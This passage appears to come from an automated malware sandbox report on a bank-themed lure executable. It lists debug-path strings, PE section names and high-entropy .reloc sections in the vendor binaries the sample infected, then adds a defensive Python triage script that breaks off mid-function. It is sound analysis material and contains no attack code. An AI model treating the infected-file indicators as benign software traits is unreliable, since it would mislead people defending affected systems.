Source: Binary string: MsSense.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MsSense.pdb source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: locator.pdb source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: vws\dll\mscorlib.pdb source: RegSvcs.exe, 00000013.00000002.1440773629.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1671146289.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerceptionSimulationService.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerfHost.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000002.00000003.1649365761.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdbP source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbL" source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerfHost.pdb source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, build.exe, 0000000A.00000002.2603046672.0000000006620000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdb source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdbGCTL source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: locator.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: alg.exe.0.dr Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress, 0_2_00404B37
Source: AppVClient.exe.0.dr Static PE information: real checksum: 0xcd10f should be: 0x153130
Source: armsvc.exe.0.dr Static PE information: section name: .didat
Source: alg.exe.0.dr Static PE information: section name: .didat
Source: officesvcmgr.exe.2.dr Static PE information: section name: .didat
Source: chrome_pwa_launcher.exe.2.dr Static PE information: section name: .gxfg
Source: chrome_pwa_launcher.exe.2.dr Static PE information: section name: .retplne
Source: chrome_pwa_launcher.exe.2.dr Static PE information: section name: LZMADEC
Source: chrome_pwa_launcher.exe.2.dr Static PE information: section name: _RDATA
Source: elevated_tracing_service.exe.2.dr Static PE information: section name: .gxfg
Source: elevated_tracing_service.exe.2.dr Static PE information: section name: .retplne
Source: elevated_tracing_service.exe.2.dr Static PE information: section name: CPADinfo
Source: elevated_tracing_service.exe.2.dr Static PE information: section name: _RDATA
Source: elevated_tracing_service.exe.2.dr Static PE information: section name: malloc_h
Source: chrmstp.exe.2.dr Static PE information: section name: .gxfg
Source: chrmstp.exe.2.dr Static PE information: section name: .retplne
Source: chrmstp.exe.2.dr Static PE information: section name: .rodata
Source: chrmstp.exe.2.dr Static PE information: section name: CPADinfo
Source: chrmstp.exe.2.dr Static PE information: section name: LZMADEC
Source: chrmstp.exe.2.dr Static PE information: section name: _RDATA
Source: chrmstp.exe.2.dr Static PE information: section name: malloc_h
Source: setup.exe.2.dr Static PE information: section name: .gxfg
Source: setup.exe.2.dr Static PE information: section name: .retplne
Source: setup.exe.2.dr Static PE information: section name: .rodata
Source: setup.exe.2.dr Static PE information: section name: CPADinfo
Source: setup.exe.2.dr Static PE information: section name: LZMADEC
Source: setup.exe.2.dr Static PE information: section name: _RDATA
Source: setup.exe.2.dr Static PE information: section name: malloc_h
Source: notification_helper.exe.2.dr Static PE information: section name: .gxfg
Source: notification_helper.exe.2.dr Static PE information: section name: .retplne
Source: notification_helper.exe.2.dr Static PE information: section name: CPADinfo
Source: notification_helper.exe.2.dr Static PE information: section name: _RDATA
Source: os_update_handler.exe.2.dr Static PE information: section name: .gxfg
Source: os_update_handler.exe.2.dr Static PE information: section name: .retplne
Source: os_update_handler.exe.2.dr Static PE information: section name: CPADinfo
Source: os_update_handler.exe.2.dr Static PE information: section name: LZMADEC
Source: os_update_handler.exe.2.dr Static PE information: section name: _RDATA
Source: chrome_proxy.exe.2.dr Static PE information: section name: .gxfg
Source: chrome_proxy.exe.2.dr Static PE information: section name: .retplne
Source: chrome_proxy.exe.2.dr Static PE information: section name: _RDATA
Source: crashreporter.exe.2.dr Static PE information: section name: .00cfg
Source: crashreporter.exe.2.dr Static PE information: section name: .voltbl
Source: default-browser-agent.exe.2.dr Static PE information: section name: .00cfg
Source: default-browser-agent.exe.2.dr Static PE information: section name: .voltbl
Source: firefox.exe.2.dr Static PE information: section name: .00cfg
Source: firefox.exe.2.dr Static PE information: section name: .freestd
Source: firefox.exe.2.dr Static PE information: section name: .retplne
Source: firefox.exe.2.dr Static PE information: section name: .voltbl
Source: updater.exe.2.dr Static PE information: section name: CPADinfo
Source: updater.exe.2.dr Static PE information: section name: malloc_h
Source: maintenanceservice.exe.2.dr Static PE information: section name: .00cfg
Source: maintenanceservice.exe.2.dr Static PE information: section name: .voltbl
Source: maintenanceservice.exe.2.dr Static PE information: section name: _RDATA
Source: elevation_service.exe.2.dr Static PE information: section name: .00cfg
Source: elevation_service.exe.2.dr Static PE information: section name: .gxfg
Source: elevation_service.exe.2.dr Static PE information: section name: .retplne
Source: elevation_service.exe.2.dr Static PE information: section name: _RDATA
Source: elevation_service.exe.2.dr Static PE information: section name: malloc_h
Source: maintenanceservice.exe0.2.dr Static PE information: section name: .00cfg
Source: maintenanceservice.exe0.2.dr Static PE information: section name: .voltbl
Source: maintenanceservice.exe0.2.dr Static PE information: section name: _RDATA
Source: elevation_service.exe0.2.dr Static PE information: section name: .gxfg
Source: elevation_service.exe0.2.dr Static PE information: section name: .retplne
Source: elevation_service.exe0.2.dr Static PE information: section name: _RDATA
Source: Acrobat.exe.2.dr Static PE information: section name: .didat
Source: Acrobat.exe.2.dr Static PE information: section name: _RDATA
Source: unpack200.exe.2.dr Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.dr Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.dr Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.2.dr Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.2.dr Static PE information: section name: _RDATA
Source: cookie_exporter.exe.2.dr Static PE information: section name: .00cfg
Source: cookie_exporter.exe.2.dr Static PE information: section name: .gxfg
Source: cookie_exporter.exe.2.dr Static PE information: section name: .retplne
Source: cookie_exporter.exe.2.dr Static PE information: section name: _RDATA
Source: identity_helper.exe.2.dr Static PE information: section name: .00cfg
Source: identity_helper.exe.2.dr Static PE information: section name: .gxfg
Source: identity_helper.exe.2.dr Static PE information: section name: .retplne
Source: identity_helper.exe.2.dr Static PE information: section name: _RDATA
Source: identity_helper.exe.2.dr Static PE information: section name: malloc_h
Source: setup.exe0.2.dr Static PE information: section name: .00cfg
Source: setup.exe0.2.dr Static PE information: section name: .gxfg
Source: setup.exe0.2.dr Static PE information: section name: .retplne
Source: setup.exe0.2.dr Static PE information: section name: LZMADEC
Source: setup.exe0.2.dr Static PE information: section name: _RDATA
Source: setup.exe0.2.dr Static PE information: section name: malloc_h
Source: msedgewebview2.exe.2.dr Static PE information: section name: .00cfg
Source: msedgewebview2.exe.2.dr Static PE information: section name: .gxfg
Source: msedgewebview2.exe.2.dr Static PE information: section name: .retplne
Source: msedgewebview2.exe.2.dr Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.2.dr Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.2.dr Static PE information: section name: _RDATA
Source: msedgewebview2.exe.2.dr Static PE information: section name: malloc_h
Source: msedge_proxy.exe.2.dr Static PE information: section name: .00cfg
Source: msedge_proxy.exe.2.dr Static PE information: section name: .gxfg
Source: msedge_proxy.exe.2.dr Static PE information: section name: .retplne
Source: msedge_proxy.exe.2.dr Static PE information: section name: _RDATA
Source: msedge_proxy.exe.2.dr Static PE information: section name: malloc_h
Source: msedge_pwa_launcher.exe.2.dr Static PE information: section name: .00cfg
Source: msedge_pwa_launcher.exe.2.dr Static PE information: section name: .gxfg
Source: msedge_pwa_launcher.exe.2.dr Static PE information: section name: .retplne
Source: msedge_pwa_launcher.exe.2.dr Static PE information: section name: LZMADEC
Source: msedge_pwa_launcher.exe.2.dr Static PE information: section name: _RDATA
Source: msedge_pwa_launcher.exe.2.dr Static PE information: section name: malloc_h
Source: notification_click_helper.exe.2.dr Static PE information: section name: .00cfg
Source: notification_click_helper.exe.2.dr Static PE information: section name: .gxfg
Source: notification_click_helper.exe.2.dr Static PE information: section name: .retplne
Source: notification_click_helper.exe.2.dr Static PE information: section name: CPADinfo
Source: notification_click_helper.exe.2.dr Static PE information: section name: _RDATA
Source: notification_click_helper.exe.2.dr Static PE information: section name: malloc_h
Source: pwahelper.exe.2.dr Static PE information: section name: .00cfg
Source: pwahelper.exe.2.dr Static PE information: section name: .gxfg
Source: pwahelper.exe.2.dr Static PE information: section name: .retplne
Source: pwahelper.exe.2.dr Static PE information: section name: _RDATA
Source: pwahelper.exe.2.dr Static PE information: section name: malloc_h
Source: AcroCEF.exe.2.dr Static PE information: section name: .didat
Source: AcroCEF.exe.2.dr Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe.2.dr Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe.2.dr Static PE information: section name: _RDATA
Source: AcroCEF.exe0.2.dr Static PE information: section name: .didat
Source: AcroCEF.exe0.2.dr Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe0.2.dr Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe0.2.dr Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00428945 push ecx; ret 0_2_00428958
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00402F12 push es; retf 0_2_00402F13
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00ADB180 push 00ADB0CAh; ret 0_2_00ADB061
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00ADB180 push 00ADB30Dh; ret 0_2_00ADB1E6
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00ADB180 push 00ADB2F2h; ret 0_2_00ADB262
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00ADB180 push 00ADB255h; ret 0_2_00ADB2ED
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00ADB180 push 00ADB2D0h; ret 0_2_00ADB346
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00ADB180 push 00ADB37Fh; ret 0_2_00ADB3B7
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AD520C push 00AD528Fh; ret 0_2_00AD522D
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF852Eh; ret 0_2_00AF7F3A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF8514h; ret 0_2_00AF7F66
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF7E66h; ret 0_2_00AF8057
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF817Ah; ret 0_2_00AF808B
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF82E5h; ret 0_2_00AF80D9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF826Ah; ret 0_2_00AF819E
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF849Ch; ret 0_2_00AF81E4
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF805Ch; ret 0_2_00AF8255
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF8321h; ret 0_2_00AF82E0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF7FBFh; ret 0_2_00AF831F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF7FA8h; ret 0_2_00AF834C
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF84BAh; ret 0_2_00AF83E2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF8426h; ret 0_2_00AF84D8
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF8075h; ret 0_2_00AF84FD
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF808Ch; ret 0_2_00AF8512
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF8B6Fh; ret 0_2_00AF8596
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF8E94h; ret 0_2_00AF85C9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF878Bh; ret 0_2_00AF8734
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF8D45h; ret 0_2_00AF87D3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF8E5Fh; ret 0_2_00AF885F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF8AB5h; ret 0_2_00AF8B13
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AF8550 push 00AF8784h; ret 0_2_00AF8CA1
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Static PE information: section name: .reloc entropy: 7.931602490930911
Source: niellist.exe.0.dr Static PE information: section name: .reloc entropy: 7.931602490930911
Source: AppVClient.exe.0.dr Static PE information: section name: .reloc entropy: 7.936484752465955
Source: officesvcmgr.exe.2.dr Static PE information: section name: .reloc entropy: 7.937208276445302
Source: chrome_pwa_launcher.exe.2.dr Static PE information: section name: .reloc entropy: 7.941673740769108
Source: AutoIt3_x64.exe.2.dr Static PE information: section name: .reloc entropy: 7.943916878766287
Source: SciTE.exe.2.dr Static PE information: section name: .reloc entropy: 7.912294411088926
Source: jucheck.exe.2.dr Static PE information: section name: .reloc entropy: 7.931052218150096
Source: jusched.exe.2.dr Static PE information: section name: .reloc entropy: 7.936037837889428
Source: elevated_tracing_service.exe.2.dr Static PE information: section name: .reloc entropy: 7.937492437508995
Source: chrmstp.exe.2.dr Static PE information: section name: .reloc entropy: 7.9359021068054485
Source: setup.exe.2.dr Static PE information: section name: .reloc entropy: 7.935901892594789
Source: notification_helper.exe.2.dr Static PE information: section name: .reloc entropy: 7.9446303310280735
Source: os_update_handler.exe.2.dr Static PE information: section name: .reloc entropy: 7.943489828015681
Source: chrome_proxy.exe.2.dr Static PE information: section name: .reloc entropy: 7.940804420536394
Source: default-browser-agent.exe.2.dr Static PE information: section name: .reloc entropy: 7.941517758258086
Source: firefox.exe.2.dr Static PE information: section name: .reloc entropy: 7.93886858959448
Source: updater.exe.2.dr Static PE information: section name: .reloc entropy: 7.878644949506129
Source: elevation_service.exe.2.dr Static PE information: section name: .reloc entropy: 7.945941404050487
Source: elevation_service.exe0.2.dr Static PE information: section name: .reloc entropy: 7.945122234201387
Source: 7zFM.exe.2.dr Static PE information: section name: .reloc entropy: 7.932133822129433
Source: 7zG.exe.2.dr Static PE information: section name: .reloc entropy: 7.9276747476160345
Source: Acrobat.exe.2.dr Static PE information: section name: .reloc entropy: 7.940529493632316
Source: identity_helper.exe.2.dr Static PE information: section name: .reloc entropy: 7.940722839651193
Source: setup.exe0.2.dr Static PE information: section name: .reloc entropy: 7.944734605502099
Source: msedgewebview2.exe.2.dr Static PE information: section name: .reloc entropy: 7.936561935775991
Source: msedge_proxy.exe.2.dr Static PE information: section name: .reloc entropy: 7.94225456216923
Source: msedge_pwa_launcher.exe.2.dr Static PE information: section name: .reloc entropy: 7.9462488646796805
Source: notification_click_helper.exe.2.dr Static PE information: section name: .reloc entropy: 7.944000050287652
Source: pwahelper.exe.2.dr Static PE information: section name: .reloc entropy: 7.940884454479864
Source: AcroCEF.exe.2.dr Static PE information: section name: .reloc entropy: 7.937547865419181
Source: SingleClientServicesUpdater.exe.2.dr Static PE information: section name: .reloc entropy: 7.943696985461369
Source: AcroCEF.exe0.2.dr Static PE information: section name: .reloc entropy: 7.937547623122581
Source: SingleClientServicesUpdater.exe0.2.dr Static PE information: section name: .reloc entropy: 7.943698423708796
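The static PE observations above (the 0xF67E8745 timestamp that decodes to January 2101, the AppVClient.exe checksum that does not match its bytes, the vendor-specific section names, and a .reloc section at roughly 7.93 bits per byte in every dropped file) can be reproduced offline with a short triage script. What follows is an added example written for this page, not code from the sandbox vendor or from the sample. All function names are the example's own, and the two-section PE it builds is constructed in memory, reusing only the timestamp and stored-checksum values shown above. One caveat worth keeping in mind when reading the section-name lines: names such as .gxfg, .retplne, CPADinfo, malloc_h and _RDATA are normal in Chromium, Firefox and Acrobat builds, so that indicator carries little weight here. A relocation table, by contrast, is repetitive low-entropy data, so a .reloc at 7.9 bits per byte across otherwise legitimate vendor binaries, together with a header checksum that no longer matches the file, is what points at the file infector the report flags.

```python
"""Static PE triage for the indicators listed above: a stored checksum that does
not match the file bytes, a build timestamp in the future, non-standard section
names and a near-8.0 entropy .reloc. Standard library only, no pefile needed."""
import hashlib
import math
import struct
import time
from collections import Counter

# Names a stock MSVC toolchain emits (.didat is its delay-import section). Vendor
# builds legitimately add names such as .gxfg, .retplne, CPADinfo, malloc_h or
# _RDATA, so an unknown name on its own is a weak indicator.
KNOWN_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".xdata", ".rsrc",
                  ".reloc", ".idata", ".edata", ".tls", ".bss", ".CRT", ".didat"}
ENTROPY_ALERT = 7.0   # a genuine relocation table is repetitive and sits far below

def shannon_entropy(buf):
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniform random bytes."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())

def pe_checksum(data, checksum_offset):
    """Recompute OptionalHeader.CheckSum the way CheckSumMappedFile does: fold all
    32-bit words except the CheckSum field itself to 16 bits with end-around
    carry, then add the file length. Assumes a 4-byte-aligned PE header."""
    total = 0
    padded = data + b"\0" * (-len(data) % 4)
    for i in range(0, len(padded), 4):
        if i == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, i)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)

def parse_pe(data):
    """Minimal header walk: timestamp, stored checksum and per-section entropy."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    _, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt_off = pe_off + 24
    checksum_off = opt_off + 64                    # same offset in PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    sections = []
    for i in range(nsec):
        name, _, _, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt_off + opt_size + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
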